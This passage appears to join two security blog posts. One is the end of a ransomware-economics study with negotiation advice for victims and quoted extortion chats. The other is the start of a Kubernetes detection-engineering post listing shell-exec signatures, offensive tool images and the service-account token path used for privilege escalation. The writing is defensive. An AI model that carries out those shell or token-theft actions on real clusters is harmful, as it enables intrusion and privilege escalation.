The highest amount of ransom payment within the data set was 14 million. This was one case from the second dataset where the ransom was paid by a Fortune 500 company was found to be only $822 per every million in revenue, or 0.00822% of the annual revenue. The medium ransom of the small enterprises of the first dataset was found to be 0.22%. The duration of participating in criminal activities affects the Risk Cost significantly. It is therefore understandable that a financially motivated actor could cherry pick valuable targets and profit from just a few big ransoms instead of attacking small companies. This situation leads to a few ransomware groups indeed deciding to only target big and profitable enterprises. In the second dataset (D-second), around 14% (N = 15) of 105 victims paid, with an average amount of$ 2,392,661 per victim. The owners of this second RaaS platform received less commission if the actor receives a higher amount of ransom. Therefore, there is an incentive for actors using the second RaaS platform to target high profile companies.

Maximise the Profit – Discussion

We realise that there are limitations on doing this research. We cannot say for certain that the identified victims set is representative for the entire population. Furthermore, based on our qualitative research we know that ransomware groups also use other factors to determine the price, such as the number of computers and servers that are encrypted, the number of employees or the expected amount of media exposure a company will receive if people find out they got compromised. Unfortunately, these factors are not all open-source and are therefore more difficult to compare. Although our dataset shows that the final ransom price has a correlation with the victim’s revenue, it cannot fully explain how adversaries set the ransom demands.

Do we negotiate with criminals?

Even though we have painted a bleak picture in our previous analysis, not all hope is lost. Despite their best efforts, the adversaries attacking companies are also just humans, and humans make mistakes or  can be influenced into making certain decisions. In the next two sections we will try to explain what options are left when the decision to negotiate is made .

Process-based tips before the negotiation starts

Although the focus of our research was the negotiation phase of a ransomware attack, we also wanted to provide some guidelines and tips on what to do before the negotiations start. We will not go into all things related to crisis management strategies, as there already is an abundance of trainings and information on the topic provided online and in print . We will, however, touch upon some topics that we feel are not always covered in other sources which we learned from reading the negotiations between ransomware groups and victims.

1.    Preparing employees

The first thing any company should teach their employees is not to open the ransom note and click on the link inside it. In the D-second database, and we have seen this at other adversaries as well, the timer starts to count when you click on the link. You can give yourself some valuable time by not doing this. Use this time to assess the impact of the ransomware infection. Address this in a structured manner by asking the following questions: Which parts of your infrastructure are hit? What kind of consequences does this have for your day-to-day operation? How much money are we talking about? This will allow you to retake a degree of control over the situation by mapping the future strategy better.

Secondly, before you start negotiating, you should discuss your goal. What is it that you want to achieve? Is your technical department (perhaps with some outside help) able to restore the backups and do you need to extend the timer, or are you going for a lower ransom? It is also important to decide what ransom demand would be your best- and worst-case scenarios. You will only learn the actual demand when you click on the link, but you should at least make an estimation of what you could pay before you open a conversation with the adversary.

3.    Communication lines

Another important thing to think about is to set up internal and external communication lines. Who is going to be responsible for what? A ransomware attack is not just an IT issue. Involve your crisis management team and you board to answer strategic questions. Involve legal counsel who can help answering the questions about possible cyber insurance coverage, and will know about rules and regulations regarding any institutions that need to be informed about data breaches. Also do not forget your communications department. It is getting more common for adversaries to inform the media that they have hacked a company. This is done to put extra stress and pressure on the company’s decision making. Realising this beforehand and having a media strategy prepared will help taking control of the situation, and mitigate possible damages.

4.    Inform yourself

Lastly, we advise to get informed about your attacker. Do some research yourself about their capabilities or hire a specialised company with a threat intelligence department. They can tell you more about the peculiarities of the adversary you are dealing with. Perhaps they have a decryptor which is not available online or know of another company who might be of help. They can also tell you more about the reliability of the adversary you are dealing with. Furthermore, knowing if you should expect a DDOS attack, calls to your customers, or the leakage of information to the press will be useful information to incorporate into your crisis management strategy.

Negotiation strategies

If the decision to pay the ransom is made , there are still ways to lessen the damage. Based the analysis of more than 700 cases we can give the following advice. Note that using just one of these strategies in your negotiation will not help as much but trying to implement as many of these as possible could save companies millions of dollars.

1.    Be respectful

This first tip might sound obvious, but crises can be emotional rollercoasters. Owners of companies can see their lives work vanish in front of their eyes, like seeing your house burn to the ground. We have seen multiple examples of companies getting frustrated and angry in conversations with threat actors resulting in chats being closed. Look at the ransomware crisis as a business transaction. Hire outside help if needed but stay professional. From the study of D-first database we learned that there is a negative relation between being kind and the amount of ransom paid in the end. One example of someone who went above and beyond during a negotiation is the following. This person managed to talk the ransom down from 4 million to 1.5 million dollars.

“Thanks Sir. We can pay 750,000 USD in XMR, provided that you will share with me the exact scope, volume, and significance of data that is in your possession. (…) I do stress the data, rather than the decryption key, since I learned about your very positive reputation in providing decryption keys. Looking forward hearing your thoughts. Respectfully, {victim’s name}.”

This example shows that not only should you see the negotiation as a business transaction, but it is also best to leave your emotions outside of the conversation.

2.    Do not be afraid to ask for more time.

Adversary will usually try to pressure you into making quick decisions. This is often done by threatening to leak documents after a certain amount of time or by threatening to double the ransom. The more stress the adversary can impose on you, the worse your decision making will be. However, in almost all D-second cases the adversary was willing to extend the timer when negotiations were still ongoing. This can be helpful for several reasons. In the beginning of the process, you will need time to assess the situation and rule out any possibilities of restoring your data. Similarly, it can give you extra time to produce different strategies. If you decide to pay in the end, you will need to make arrangements to acquire the right cryptocurrency.

We have seen examples of cases in which the negotiation went on multiple weeks after the deadline. In this case the deadline was already over for two days:

Hello, I’m going to be as up front and honest as I can be right now and let you know that we have not been able to secure the 12 million dollars and we also have just now been able to download the data that you took so that we can review it. If at all possible, we need some more time to get together what we can get together to, at the very least, make a reasonable offer. Coming up with the 12 million is almost impossible but if it doubles, there’s no way we will be able to come up with the money. Just a few more days and we should be in a position to give you a realistic and reasonable offer. Any help would be greatly appreciated!

After being asked how much time they needed, the victim responded that they would need at least another week. The adversary agreed with this if they guaranteed a payment of 1 million within 24 hours otherwise the price would be doubled to 24 million. The victim responded to this by saying:

“I understand that and trust me, we are really trying here. This is exactly why I asked for more time. We have been working all night to gather just the funds to buy more time and we aren’t there. 1 million isn’t going to be possible right now 12 million is definitely going to take more time than 1 million and 24 million just isn’t possible at all really. This is the situation we are in right now. All we’ve asked for is more time and you are going to pass up on a potentially big payday over just giving us a few more days? How much effort would it take on your part just to give us a little more time? You’ve already taken our data and crippled our business. What more effort do you have to put forth to just work with us and give us a few more days. I’ve told you multiple times that we are trying like hell to get this money together from the moment you locked us down. Give us the time and we’ll get whatever we can get together and we’ll continue to communicate with you or don’t give us the time and get nothing. We’ll recover from this or we won’t and you will have put a bunch of people out of work that have been here for their entire careers. This is our livelihoods, this is how we feed our families, this is how we pay our bills. Please try and keep that in mind.

In the end they ended up paying 1.5 million dollars in cryptocurrency. Another way  to get more time is by explaining that higher-ups need more time to make decisions, or that you need more time to buy crypto:

“Not to mention it’s the weekend here and the banks or crypto buying sites aren’t open to get anything converted. Your timer runs out tomorrow. Just give us a few more days. We are trying here but we need a little help from you.”

3.    Promise to pay a small amount now or a larger amount later.

Whereas stalling for time can be an effective strategy if you want to prevent your data getting leaked while rebuilding your systems,  the following strategy can help  negotiating to settle on a smaller amount. Adversaries also have an incentive to close a deal quickly and move on to their next target. In multiple cases we have seen that the adversary in the D-second database gave large discounts when presented the option of getting a small amount of money now instead of a large amount of money later. In one case the adversary said the following after an initial demand of 1 million US dollars:

“I spoke to my boss and explained your situation to him. He approved a payment of 350k dollars. There will be no more discounts. Now you are offering 300k dollars, raise your price by 50k and we will close this deal now.”

4.    Convince the adversary you cannot pay the high ransom amount.

One of the most effective strategies is to convince the adversary your financial position does not let you pay the ransom amount that is initially asked. In one example a company was asked to pay 2 million and responded the following:

“We have discussed this with our management team. We do want the decryptor for our network and for our data to be deleted, but you have asked for a lot of money especially at the end of a difficult year. Can you offer us a lower price?

They got a 50K discount and ended up paying 1.95 million. Although this seems like a good deal, there are cases in which much less has been paid after a more drawn-out negotiation in which the victim was not as willing to pay. Two examples of this are two companies who both had to pay 1 million, but one ended up paying 350K and the other only 150K. There is also an example of a victim who talked down the price from 12 million to 1.5 million.

These companies achieved this by constantly stressing they could not pay the amount that was asked. One example of this is:

“Our overall revenue has suffered significant impacts in the past year and we are still losing more and more money by the day. Your demand of 12 million dollars is a large portion of our entire revenue for all of last year. You may not know anything about us as a company but we provide a vital service for our clients and this incident has affected not only our business but also many many people and other businesses that rely on us and our services. With all of that being said, we are still willing to pay something to get our data unlocked and not have our client’s information out on the internet for everyone to see. What we can offer you is 1,000,000 USD in bitcoin today to be done with this”.

Later they said:

“(…) With that being said, this payment is out of our own pockets and the million dollars is what we had. We’ve been in discussions all day with our team and we are willing to up our offer to 1,200,000 USD. Work with us here, we are paying for this out of pocket.”

“We’ve looked everywhere and tapped every resource we can tap and taken out every loan we can take out and we’ve been able to come up with another 150k to bring our offer to 1,350,000 USD.”

“We are doing the absolute best we can. With that being said, the owner of the company has agreed to take 50k out of his own pocket to further increase our offer to 1,400,000 USD. That is a hell of a lot of money for anyone and especially us. This is not only affecting our company, it’s affecting PEOPLE real, honest, and hard working people. Basically where we are at right now is that you can take this 1.4 million dollars to make sure that our data doesn’t get released or release the data and it’s worthless from a payment standpoint. There will be no reason at all for us to pay for anything to you once that’s done. We’ll focus our efforts on rebuilding our reputation and rebuilding our business. Please think about the two options here. Thank you for your consideration.”

After this the adversary agreed to the amount of 1.5 million which the victim ended up paying.

Now you might ask yourself, I understand this technique might work for companies who do not have that much money, but what about bigger companies with an obviously larger budget at their disposal? Does the adversary not have access to the financial statements of companies when they get hacked? One of the D-second victims was a Fortune 500 company who got this as a response from the adversary when telling them that they could only pay 2.25 million at max:

“Thank you for your offer but we have a counteroffer. Let me do some pretty important points. The first you are one of Fortune 500 companies with a revenue 16-18 billion, am I right? You produce kind of very important product right now (…) and because online business is booming right now. Back to the numbers we had encrypted 5,000-6,000 of your servers (…). So, if we do same VERY simple calculation. Your expenditures like, let say I don’t know $50 per hour or may me you are even more generous like$65? So, 24 hours spent to restore one server multiply per one encrypted by us server, this is like 10 million dollars in expenditure only on a labour, but don’t forget you spent all this time for installation and OOPS you can’t even restore any data because this is gone for next 1000 year of intensive calculations. The timer it ticking and in in next 8 hours your price tag will go up to 60 million. So, you this are your options first take our generous offer and pay to us $28,750 million US or invest some monies in quantum computing to expedite a decryption process.” As you can see the adversary is not very willing to compromise. However, it seems they did not do a deep dive into the financial records of this company. They primarily talk about the servers they hacked. We speculate this might be because the ability to hack companies, and the ability to read and dissect complex financial statements might not have as much overlap. Even if they have access to those files, there is a difference between having a certain amount of revenue and having a couple million dollars in crypto laying around just for the occasion. In this example the company ended up paying 14.4 million instead of the 28.75 million which was asked initially. 5. If possible, do not tell anyone you have cyber insurance Our last negotiation strategy is that you must not mention to the adversary you have cyber insurance and preferably also do not save any documents related to it on any reachable servers. These are two examples of messages from chats in which the adversary knew the victim had insurance: “Yes, we can prove you can pay 3M. Contact your insurance company, you paid them money at the beginning of the year and this is their problem. You have protection against cyber extortion. (…) I know that you are now in trouble with profit. We would never ask for such an amount if you did not have insurance.” “Look, we know about your cyber insurance. Let’s save a lot of time together? You will now offer 3M, and we will agree. I want you to understand, we will not give you a discount below the amount of your insurance. Never. If you want to resolve this situation now, this is a real chance.” Although a company could still tell the adversary that the insurance company is not willing to pay, this limits the options for any negotiation severely. Some practical tips during the negotiation Besides the process-based strategies before and during the negotiation, we also wanted to give a few tips that should be done regardless of your strategy: 1. The first thing any company should do is try to set up a different means of communication with the adversary and if they do not want to switch, they should realise their communication is not private. Getting access to these chats is not the most demanding thing for technically skilled people. It happened multiple times that during a negotiation a chat got infiltrated by third parties who started interfering and disturbing the negotiation. 2. Always asks for a test file to be decrypted. Although most infamous adversaries have a decent reputation nowadays, you can never be too sure. 3. Make sure to ask for a proof of deletion of the files if you ended up paying. There are examples of companies who paid, but their files are still openly accessible online. 4. Always prepare for a situation in which your files will still be leaked or sold. Despite what the adversaries may show you, you have absolutely no guarantee that your files got deleted. Especially with RAAS platforms your system access and files will have gone through many different parties before they reached the final adversary you were negotiating with. Even if they properly deleted your files, who’s to say any of the other people in the chain did not quickly make a copy of some interesting files for ‘personal usage’. 5. Ask for an explanation of how the adversary hacked you. In one case a company received an extensive report from the adversary on how they got access and what the company should do to close any vulnerabilities. Chat conversation between a victim and D-Second adversary In this example we see the use of multiple negotiation strategies. The victim asks for more time, and successfully talks down the ransom demand from 13 million to 500K. “Hello. Can we please get some sample files you took from us? Thank you” “Hello. we took all files by our filters , round- about 2 TB. What proofs you want see? We will send proofs in 12 hours round about. 100 screenshots from infrastructure and evidence pack of data.” “Thank you. Would it be possible to also receive a list of files? Thank you” “Full file tree will be only able in 1-2 working days, quantity of data is so high. Proof pack of files we already started to prepare. Very soon will be sent. Here you are proof pack of your data, we are interested in to continue dialog with CEO, CFO. We are not interested in to talk with system administrators. Don’t worry we done full dump, files from your network by our smart filters.” “Hello. Thank you for the sample files. When can we get a file tree?” “Full file tree will be able after successful deal. In other case files will go to public & mass media. Proof package where provided already with some samples of documents and screenshot as well. Article able public for all, in 2 days we will start publicate data.” “We thought we have almost 6 days left. Our leadership is currently reviewing the situation and determining the best resolution.” “Until we waiting for your reply on situation. We stopped DDoS attack to your domain, you can switch on your website. As well your blog, where hidden. Nobody will see information about that, until we will not get in deal. We stopped already other instruments which already where processed today.” “Okay, thank you. We want to cooperate with you. We just need some time during this difficult situation.” “Hello. We would like to know how you came up with this price for us. It is very high.” “Hello. We work on mathematical algorithms for each client price is different depending on their financial situation, sphere of activity and other aspects. In your situation price comes like is it. What price is not so high for you, then we have question.” “Our industry has been suffering in revenue over the last couple of years and we don't make enough to pay even close to that much. Can you suggest a much lower amount that would satisfy you?” “We have been asked before, we doesn’t get answer - on our question - What price is not so high for you ???” “Can you please tell us what we will receive once payment is made?” “You will get: 1) full decrypt of your systems and files 2) full file tree 3) we will delete files witch we taken from you 4) audit of your network " “This situation is very difficult for us and we are worried we may get attacked again or pay and you will still post our data. What assurances or proof of file deletion can you give us?” “We have reputation and word, we worry about our reputation as well. After successful deal you will get: 1) full file trees of your files 2) after you will confirm we will delete all information and send you as proof video, we are not interested in to give to someone other your own data. We never work like that.” “Okay, thank you. We are going to have some meetings this weekend with our leadership. We need to assess our available funding and we can get back to you after that with what we can pay. Thank you for your patience.” “We wait” “These leadership meetings are going to take this weekend to complete. It may take until Monday to come up with what we might be able to pay.” “OK” “Hello. We would like to know if you would accept our offer of$300k? Our revenue has been severely impacted as the industry has suffered over the last few years, and we can not pay even close to the amount you have asked. We only hope you can understand our situation. Thank you.”

“Hello. Thank you for offer, sorry but we can't gave you so big discount. We know that all businesses are impacted by Covid-19, and financial crisis , etc. for Us the situation same. We have different questions to you 1) Your reputation costs 300 000 USD? And customer trust. 2) Costs for lawsuits with GDPR as well will cost nothing? 3) How about investors they already know about the situation? We always go forward to our clients. The legal losses will be much greater on today. In case of successful deal think about better offer, and come back. Time is settled and we will continue our procedures if you don’t take situation serious.”

“We of course understand the severity of the situation and have considered all of these issues, however we are offering what we have available. We are a very small company and do not have much revenue and we are offering what we can. We can try to come up with a little more, but it is not so much. We hope you can work with us as we try to satisfy the needs for both of us. Thank you.”

“What’s the offer?”

“We will get back to you shortly with a revised offer. Thank you”

“Hello. We would like to know if you would accept $350k? This is a significant amount of money for us at this time. Thank you.” “We will never accept such ridiculous amount, make it x10 higher and we will think.” “Thank you for your patience. Unfortunately the amount you are asking for is not something we are able to provide. We are a small company and do not have the revenue, and our insurance is not enough to help with this. We are able to increase our offer to$425k. Please let us know if you are willing to work with us in this. Thank you.”

“I said you, you must make your offer x10 higher. If you continue to make your ridiculous steps, we will ignore you.”

“And don't forget, you have the last 21 hours before price will be doubled and all discounts will be impossible, and sure, post with you sensitive data will be published.”

“Hello. We thank you again for your patience. We are asking for you to take into account the difficult position we are in. We do not have the cash funds available or insurance to pay the amount you are seeking. We are not even able to borrow the money right now. We are only able to offer you a little more money right now and this is the most we can do. We can only pay up to $500k. This is our final offer and are prepared for what will happen if you do not accept. If you accept we will arrange for the payment. Thank you for your consideration.” “O.K. Your price is changed to 500 000 USD (in XMR Monero). We are ready for compromise.” “Okay, thank you very much. Please add some time back to the timer so we can arrange for the funds to be sent. We will start the process right away.” “We wait” “Can you show us proof of ability to decrypt our files?” “Of course. Send one file we will decrypt and send it back” “Hello. We are getting close to finalizing making the payment. We will notify you when it is coming, but we would like to conduct a test transaction first. Please confirm you will provide the following when payment is made: 1) Decryption tool 2) File tree 3) Can you provide a link so we can download all of our files in case there is a problem decrypting them? 4) Proof of file deletion after we download all of the files.” “1) decrypt tool you I will get instantly 2) file tree will start make after payment 3) all your files if will be needed we will share by link 4) and video of course. Write after sending money.” “Great, thank you. Will 2250 xmr be okay? That was the amount we purchased because of the amount shown this morning. Now it shows more. We bought 2250.” “OK” “We are preparing to send a test transaction. Once we confirmed it works we will send the remaining amount. To confirm above mentioned, we will definitely want a link to download the files. Thank you.” “Link for downloaded files will take time round - about 1 working day. Its not so easy how you think. We should prepare it for, you in case if you dont need full file tree.” “Okay, thank you” “Also, we see your payment. You have to send the rest.” “Okay we will send the rest now” “We can see your payment, after 10 confirmations we will do all that was promised.” “Thank you”  Conclusion This empirical research suggests that the ecosystem of ransomware has been developed into a sophisticated business. Each ransomware gang has created their own negotiation and pricing strategies meant to maximize their profit. There is a number of well-executed studies focusing on fighting against the (cyber-)criminal and how the adversaries penetrate given targets. However, despite the economics behind this ecosystem being its essential driver, it has oftentimes been overlooked. We concluded that there are clear signs that adversaries have adopted price discrimination techniques based on the yearly revenue of their victims. If we look at the price setting and negotiation from the adversaries’ point of view, we see that they wield a massive advantage over their victims. Not only do they have the luxury of investigating their victims’ financial statements if they choose to do so, but they also have the advantage of having previous experiences they can use. This conclusion can explain the current rise in ransomware infections around the world. Luckily, there are some strategies victims can use to diminish some of the advantages the adversary has which we have covered extensively in the previous chapters. Looking forward to the future of ransomware, it is no longer the question of whether a company is going to get breached, but rather a question of when. We have even heard people go as far as to say that it is almost an insult if your company does not get attacked nowadays, becoming a business badge of honour of sorts. Similarly, we also see that as more and more companies are becoming a ransomware victim, people are simply becoming tired of hearing it. If the increase in ransom demands stays, and the decrease in public backlash continues, we could see a shift to companies paying less often which would overall be better for society. On the other hand, this could also lead to criminals becoming more aggressive in their persuasion tactics, or lowering their ransom amounts to an equilibrium. A bit of hope comes from some recent successes from law enforcement agencies. In november 2021 Romanian authorities arrested multiple individuals suspected of deploying the REvil ransomware on victims’ systems as part of operation GoldDust. This operation included authorities from 17 countries which joined efforts with Europol, Eurojust and Interpol. Similarly, in october 2021, another police cooperation between eight countries led to the arrest of twelve suspects that allegedly were part of a worldwide ransomware network. During this investigation multiple companies could be warned that ransomware was about to be deployed on their systems preventing millions of dollars of damages. These cases are perfect examples of a way in which we can find a way to tackle this wicked problem These ransomware groups make victims in multiple countries and do not care about borders. So the only way to fight this is with coordinated international cooperation between police agencies around the world. We hope that by sharing this research to the public we can add some fuel for the defending side. We demonstrated how powerful the adversaries are during the negotiation, and, most importantly, have created a safety net for the unlucky victims who have fallen.Let us look back at the hypothetical case we opened with. “We wait”, that was their reply after you told them you needed more time. After the entire investigation is over and all the systems have been restored, it became clear to you that they were not in a hurry. They had been in the company’s systems for three weeks prior to rolling out the ransomware. They had access to all your internal documents, including all finance related statements. They knew everything about you, and you knew very little about them. They waited because they knew you would pay in the end. But how much did you end up paying? The full 3.5 million, or less? Or did you not end up paying at all. The end of this story will not be told by us, but by the countless cases that will continue to happen in the future. We just hope that the information we provided will help in making the right decisions for your situation. Acknowledgement We would like to express our special thanks to Nikki van der Steuijt, and all the members of Fox-IT threat intelligence team. References [1] Adam Young and Moti Yung, Cryptovirology: Extortion-Based Security Threats and Countermeasures, IEEE Security and Privacy, May 1996 [2] Michael Sandee, CryptoLocker ransomware intelligence report, https://blog.fox-it.com/2014/08/06/cryptolocker-ransomware-intelligence-report/, August 6, 2014 [3] Maarten van Dantzig, FAQ on the WanaCry ransomware outbreak, https://www.fox-it.com/en/news/blog/faq-on-the-wanacry-ransomware-outbreak/ [4]SOPHOS, SamSam: The (Almost) Six Million Dollar Ransomware, https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf [5] Hernandez-Castro, Julio and Cartwright, Edward and Stepanova, Anna, Economic Analysis of Ransomware (March 20, 2017). Available at SSRN: http://dx.doi.org/10.2139/ssrn.2937641 [6] A. C. Pigou, The Economics of Welfare, Macmillan and Co., Limited St. Martin’s Street, London, 1920 NCC Group Research Detection Engineering for Kubernetes clusters Written by Ben Lister and Kane Ryans This blog post details the collaboration between NCC Group’s Detection Engineering team and our Containerisation team in tackling detection engineering for Kubernetes. Additionally, it describes the Detection Engineering team’s more generic methodology around detection engineering for new/emerging technologies and how it was used when developing detections for Kubernetes-based attacks. Part 1 of this post will offer a background on the basics of Kubernetes for those from Detection Engineering who would like to learn more about K8s, including what logging in Kubernetes looks like and options available for detection engineers in using these logs. Part 2 of this post offers a background on the basics of Detection Engineering for those from the containerization space who don’t have a background in detection engineering. Part 3 of this post brings it all together, and is where we’ve made unique contributions. Specifically, it discusses the novel detection rules we have created around how privilege escalation is achieved within a Kubernetes cluster, to better enable security operations teams to monitor security-related events on Kubernetes clusters and thus to help defend them in real-world use. For those with familiarity with Kubernetes, you may wish to skip forward to our intro to Detection Engineering section here, or to our work on detection engineering for Kubernetes, here Part 1: Background – Introduction to Kubernetes Before talking about detections for Kubernetes, we’ll in this section offer a brief overview of What Kubernetes is, its’ main components, and how they work together. What is Kubernetes? Kubernetes (commonly stylized as K8s) is an open-source container-orchestration system for automating computer application deployment, scaling, and management. It was originally designed by Google and is now maintained by the Cloud Native Computing Foundation. It aims to provide a "platform for automating deployment, scaling, and operations of Container workloads". It works with a range of container tools and runs containers in a cluster, often with images built using Docker. [1] Figure 1: A typical cluster diagram. More information on the components can be found here At a high level, the cluster can be divided into two segments, the control plane and the worker nodes. The control plane is built up of the components that manage the cluster such as the API server, and it is this control plane where we focused our detection efforts which will be discussed later on. Whilst we’re discussing the various components of a cluster, it is important to quickly note how authentication and authorization is handled. Kubernetes uses roles to determine if a user or pod is authorized to make a specific connection/call. Roles are scoped to either the entire cluster (ClusterRole) or a particular namespace (Role). These roles contain lists of resources (the object) the role can grant access to, and a list of verbs that the role can perform on the said resource, are declared and then attached to RoleBindings. RoleBindings pretty much link the role (permissions) with the users and systems. More information on this functionality can be found here in the Kubernetes official documentation. apiVersion: rbac.authorization.k8s.io/v1 kind: Role metadata: namespace: default name: pod-reader rules: - apiGroups: [""] resources: ["pods"] verbs: ["get", "watch", "list"] Figure 2: Example of a policy configuration taken from the Kubernetes documentation The above policy is allowing any system or user to retrieve information on pod resources located in the default namespace of the cluster. Why use Kubernetes? Kubernetes provides the capability to scale up horizontally as opposed to scaling vertically, i.e., spreading the workload by adding more nodes instead of adding more resources to existing nodes. Kubernetes is an enticing proposition for many companies because it provides them with the ability to document configurations, disperse applications across multiple servers, and configure auto-scaling based on current demand. Kubernetes Logging Detection engineers are only as good as their data. That is why finding reliable and consistent logs is the first problem that needs solving when approaching a new technology for detection engineering. This problem is made harder as there are multiple ways of hosting Kubernetes environments, such as managed platforms like Azure Kubernetes Service (AKS), Elastic Kubernetes Services (EKS) and Google Kubernetes Services; and natively running Kubernetes as an unmanaged solution. Ultimately, we decided to utilise API server audit logs. These logs provide a good insight into what is going on inside the cluster, due to the nature of the API server. In normal operation, every request to make a change on the Kubernetes cluster goes through the API server. It is also the only log source consistent among all platforms. However, there are some issues raised by using these logs. Firstly they need to be enabled, the audit policy detailed here is a good start and is what was used in our testing environments. Some managed platforms will not let you customise the audit logging, but it still needs to be enabled. From a security perspective certain misconfiguration, such as unauthenticated access to Kubelets, would allow an attacker to bypass the API server, making these logs redundant and therefore bypassing all our detections. It is important to note that audit logs will tell you everything that is happening from an orchestration perspective (pods being deployed, configuration changes, users being added, etc), not what is happening inside the containers which in some cases tends to be where the initial compromise occurs. An audit policy that is too broad can easily generate a lot of irrelevant events, so testing of the configuration should be conducted to ensure ingestion of these events are within acceptable limits. { "kind": "Event", "apiVersion": "audit.k8s.io/v1", "level": "Request", "auditID": "bd93fded-1f5a-4046-a37c-82d8909b2a80", "stage": "ResponseComplete", "requestURI": "/api/v1/namespaces/default/pods/nginx-deployment-75ffc6d4d-nt8j4/exec?command=%2Fbin%2Fbash&container=nginx&stdin=true&stdout=true&tty=true", "verb": "create", "user": { "username": "kubernetes-admin", "groups": [ "system:masters", "system:authenticated" ] }, "sourceIPs": [ "<removed>" ], "userAgent": "kubectl/v1.21.2 (darwin/amd64) kubernetes/092fbfb", "objectRef": { "resource": "pods", "namespace": "default", "name": "nginx-deployment-75ffc6d4d-nt8j4", "apiVersion": "v1", "subresource": "exec" }, "responseStatus": { "metadata": {}, "code": 101 }, "requestReceivedTimestamp": "2021-10-21T08:39:05.495048Z", "stageTimestamp": "2021-10-21T08:39:08.570472Z", "annotations": { "authorization.k8s.io/decision": "allow", "authorization.k8s.io/reason": "" } } Figure 3: A sample of an audit log Part 2:Background – Detection Engineering Approach This next section is to give some background around our approach to detection engineering and is not specific to Kubernetes. If you are just here for the Kubernetes content, feel free to skip it and the rest of the blog will still be understandable. When approaching a problem, it can be helpful breaking it down to simpler steps. We do this in detection engineering by splitting our detections into categories. These categories allow us to look at the problem through the lens of each category and this helps create a well-balanced strategy that incorporate the different types of detection. There are three distinct categories, and each has its own strengths and weakness, but all contribute to an overall detection strategy. The categories are signatures, behaviours, and anomalies. Signatures Signatures are the simplest category. It includes detection that are predominately string matching and using known Indicator of Compromise (IoC). They are simple to create and so can be produced quickly and easily. They are usually very targeted to a single technique or procedure so produce low numbers of false positives and are easy to understand by a SOC analyst. However, they are usually trivial to bypass and should not be relied upon as the sole type of detection. Nonetheless, signatures are the first level of detection and allows for a broad coverage over many techniques. Behaviours Behavioural analytics are more robust than signatures. They are based on breaking down a technique to its core foundations and building detections around that. They are usually based on more immutable data sources, ones that can’t be changed without changing the behaviour of the technique itself. While the quality of the detection itself is usually higher, the quality of the alert is comparatively worse than signature-based analytics. They will likely produce more false positives and be harder to understand exactly why any alert is being produced due to the more abstract nature of the analytics and the need for more in-depth understanding of the technique being detected. Anomalies Anomaly analytics are any detections where "normal" behaviour is defined and anything outside of normal is alerted on. These kinds of analytics are not necessarily detecting anything malicious, but anything significantly different so that it will be worth further investigation. A single anomaly-based detection can be effective against a wide range of different techniques. However, they can be harder to evaluate performance on compared to signatures and behavioural detections as performance may significantly differ depending on the environment. This can be mitigated somewhat my using techniques that calculate the thresholds based on historical data which means the thresholds are tailored to that environment. Understanding your advantage The other concept that is useful when approaching detection engineering is "knowing where we can win". This is the idea that for any given environment/system/technology there will be areas where defenders have a natural advantage. This may be because the logging is better, the attacker is forced into doing something, or there is a limited number of options for an attacker. For example, in a Windows Environment the defender has an advantage when detecting lateral movement. This is because there is twice as much logging (logs can be available on both the source and destination host), there is a smaller number of techniques available compared to other tactics such as execution and an attacker will usually have to move laterally at some point to achieve their goals. Part 3: Kubernetes Detections Through our collaboration with NCC Group’s Containerisation team, we identified several use cases that needed detection. The main area on which we decided to focus our efforts was around how privilege escalation is achieved within the cluster. The two main ways this is done is abusing privileges of an existing account or creating a pod to attempt privilege escalation. All our detections are based on events generated by audit logs. For brevity, only a subset of our detections will be described in this blog. Signatures The audit logs are a useful source for signature-based detection, since they provide valuable information, such as request URIs, user-agents and image names where applicable. These fields in the data can be matched against lists of known suspicious and malicious strings. These lists can then be easily updated, for example, adding new signatures and removing older signatures based on their effectiveness. Interactive Command Execution in RequestURI For certain requests the requestURI field within an audit log contains the command being executed, and the namespace and pod the command is being applied to. This can be used to identify when a command shell is being used and may indicate further suspicious behaviour if unauthorized. The table contains some of the shell examples of signatures that can be used to detect this type of behaviour in the requestURI field. A full example of how this might look in an audit log can be seen in figure 3 earlier in the blog. Some example of signature that are useful t search for are: • %2Fbin%2Fbash • %2Fbin%2Fsh • %2Fbin%2Fash User-Agent The user-agent is a HTTP header that provides meta information on the kind of operating system and application that is performing the request. In some cases, it can also be used to identify certain tooling making requests. One example of using this field for signature-based detection is looking for User-Agents containing "access_matrix". Any occurrences of this would signify an access review tool is being used called Rakkess. This tool is a kubectl plugin and would be expected within say something like a dev or staging cluster. When the use is unexpected this may be indicative of an attacker performing post compromise actions.  "userAgent": "kubectl-access_matrix/v0.0.0 (darwin/amd64) kubernetes/$Format"

Another example might be the use of cURL or HTTP request libraries that may indicate post-exploit actions, especially when not been previously seen in the environment. Important to note that the user-agent can be modified by the source, so it is trivial to bypass this type of detection.

Image

This field includes the image name to be deployed and the registry from which it came. These tools all have legitimate use cases but any unauthorized use of them on a Kubernetes cluster would need alerting on and further investigation.

Some examples of such images include but aren’t limited to.

• cyberark/kubiscan
• aquasec/kubehunter
• cloudsecguy/kubestriker
• corneliusweig/rakkess

The image field could also be utilised to detect when pods are being deployed for crypto-mining purposes. Running crypto miners after compromising a cluster is a commonly seen tactic and any known crypto mining images should also be added as a signature for known bad container images.

Anonymous User Logon

With any system a user performing actions without authenticating is usually a bad thing. Kubernetes is no different and there have been some high-profile incidents where the initial access was an API Server exposed to the internet which allowed unauthenticated access. The first line of defence would be to mitigate the attack by disabling unauthenticated access. This can be done with the –anonymous-auth=false flag when starting a kubelet or API server.

As an additional layer of defence, any request to the API server where the user field is system:anonymous or system:unauthenticated should also be alerted on.

Service Account Compromise

Kubernetes pods run under the context of a service account. Service accounts are a type of user account created by Kubernetes and used by the Kubernetes systems. They differ from standard user account in that they are prefixed with “serviceaccount” and usually follow well-defined behaviours. To authenticate as a service account, every pod stores a bearer token in /var/run/secrets/kubernetes.io/serviceaccount/token, which allows the pod to make requests to the API server. However, if the pod is compromised by an adversary, they will have access to this token and will be able to authenticate as the service account, potentially leading to an escalation of privileges.

Detecting this type of compromise can be difficult as we won’t necessarily be able to differentiate between normal service account usage and the attacker using the account. However, the advantage we have is that service accounts have well-defined behaviour. A service account should never send a request to the API server that it isn’t authorised to do. Additionally, a service account should never have to check the permissions it has. Both actions are more indicative of a human using the service account rather than the system. Therefore, any requests where the user starts with “serviceaccount” that is denied or the resource field contains “selfsubjectaccessreview” should be alerted on.

Other Notable Behaviours

